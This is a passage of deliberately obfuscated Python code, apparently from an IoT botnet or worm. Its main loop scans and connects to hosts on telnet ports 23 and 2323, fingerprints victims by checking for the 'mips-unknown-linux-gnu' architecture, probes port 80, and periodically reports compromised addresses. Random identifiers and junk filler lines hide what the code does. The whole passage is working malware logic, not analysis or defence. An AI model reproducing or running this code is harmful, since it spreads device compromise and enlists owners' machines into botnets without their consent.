'%s:%d>%s:%d TN' % ( oOoOo0oooo , ii1i1I , OOOoo0 , Oo0o ) ) iII1I1I ( oOoOo0oooo , Oo0o ) O00000O ( oOoOo0oooo , Oo0o ) if 75 - 75: i1 . O0oo0OOOOO00 * OOooOO0 . i1IIi1i1iiI if Ii1IIi1iI1i1I == 1 and ( Oo0o == 23 or Oo0o == 2323 ) : OOo0OoooO ( III1 , oOoOo0oooo , Oo0o ) else : try : III1 . close ( ) except : pass IIiI1i , O0o0 , IiIIiI11I = select . select ( oOo00o , [ ] , [ ] , 0.01 ) for I1 in IIiI1i : O0 = O0OO0 ( I1 , 1 ) iIIiii = hash ( I1 ) if O0 : if re . search ( 'mips-unknown-linux-gnu' , O0 ) : Ii111i11iIi ( "%s MF" % ( O0oOo [ iIIiii ] ) ) iIi1I11 = O0oOo [ iIIiii ] . split ( ':' ) if 87 - 87: Ii / Oo0Oo iII1I1I ( iIi1I11 [ 0 ] , int ( iIi1I11 [ 2 ] ) ) O00000O ( iIi1I11 [ 0 ] , 80 ) try : I1 . close ( ) except : pass oOo00o . remove ( I1 ) O0oOo [ iIIiii ] = None if 71 - 71: oOOoO00oo0 / O0oo . Ii11i1iIi . O0oo / Ii11i1iIi if Iioo0OooOoO - i1I1oooo0oOooo > 3 : iIiiIi = min ( max ( len ( ii1o00 ) / 100 , 3 ) , 30 ) if 80 - 80: O0oo / i1 * Oooo / OOooOO0 + O0oo0OOOOO00 for O0OooO0Oo0O in range ( iIiiIi ) : oo0OO0ooo0 ( ) O0oOoo0000 ( ) i1I1oooo0oOooo = Iioo0OooOoO if Iioo0OooOoO - Ii1i1iI1IiI > 300 : IiiIi1111 ( ) if 53 - 53: Oo0 - Oo0 . oOOoO00oo0 if i1IIOO0OOoO00OO == 0 and len ( ii1o00 ) == 0 : o0o0oOOo = [ ] oO0iIiiiii1 = { } i11I11III1iii = { } O0OO0O00000 = { } O000O0o0oOOo = { } i1II = { } ii1o00 = [ ] if len ( IiIIiI1iII1Ii ) : if 91 - 91: o0ooO IiI1Iiii = [ ] for iiIiiIi1Ii1 in Oo0Oooo : oooOo0o = 0 for I1iiiiI in IiIIiI1iII1Ii : if I1iiiiI [ 0 ] == iiIiiIi1Ii1 [ 1 ] and int ( I1iiiiI [ 1 ] ) == int ( iiIiiIi1Ii1 [ 2 ] ) : if 51 - 51: OOOoOooO % Ii11i1iIi % oOoO0Ooo * Oo0 * IIiIii1iI oooOo0o = 1 break if not oooOo0o : IiI1Iiii . append ( iiIiiIi1Ii1 ) Oo0Oooo = IiI1Iiii IiIIiI1iII1Ii = [ ] if 6 - 6: O0oo0OOOOO00 / O0oo0OOOOO00 * IIiIii1iI * IIiIIiIii1I if iii1iiI111ii : if 14 - 14: oOoO0Ooo + Ii . oOOo0000o / IIiII - I11I1Ii o0o0Ooo = { } for iiIiiIi1Ii1 in Oo0Oooo : o0o0Ooo [ hash ( iiIiiIi1Ii1 [ 1 ] ) ] = 1 if 95 - 95: oOoO0Ooo / I11I1Ii % IIiII - oOOoO00oo0 * o0oooooO oO0OoOoO00OoO = o0o0Ooo if 72 - 72: o0ooO % IIiIii1iI / O0oo . Oo0Oo * oOoO0Ooo iii1iiI111ii = False OOO000oOOooOO = III111I1 ( time . time ( ) ) for iiIiiIi1Ii1 in OOO000oOOooOO : Oo0oOOooO0 = iiIiiIi1Ii1 [ 1 ] iII111iI = int ( iiIiiIi1Ii1 [ 2 ] ) if 75 - 75: Oo0Oo % oOOo0000o % oOoO0Ooo % I11I1Ii ii1o00 . insert ( 0 , "%s:%d" % ( Oo0oOOooO0 , iII111iI ) ) iii1iiI111ii = True Ii1i1iI1IiI = Iioo0OooOoO if Iioo0OooOoO - O00oO0OOoOo > 28800 : if 35 - 35: Ii . O0oo . O0oo0OOOOO00 + O0oo * i1 / O0oo I1I1I11 = { } O00oO0OOoOo = Iioo0OooOoO if Iioo0OooOoO - o0o0o00oooOoo > 3600 : if 54 - 54: Oooo IIiii1ii = III1iiIiiI ( ) if len ( IIiii1ii ) >= 8 : Ii111i11iIi ( IIiii1ii ) Ii111i11iIi ( iIiiiiii1III1 ( ) ) iiOo0000O ( ) o0o0o00oooOoo = Iioo0OooOoO if 70 - 70: i1 % IIiII + Oo0Oo time . sleep ( 0.01 ) if 87 - 87: I11I1Ii / oOoO0Ooo % i1 if 67 - 67: oOOoO00oo0 / O0oo % IIiIIiIii1I - o0ooO if 69 - 69: oOOo0000o if 60 - 60: OOooOO0 * IIiIIiIii1I . o0oooooO - IIiIIiIii1I + oOOoO00oo0 - Oo0 if 8 - 8: o0ooO . i1IIi1i1iiI . Oo0 % OOOoOooO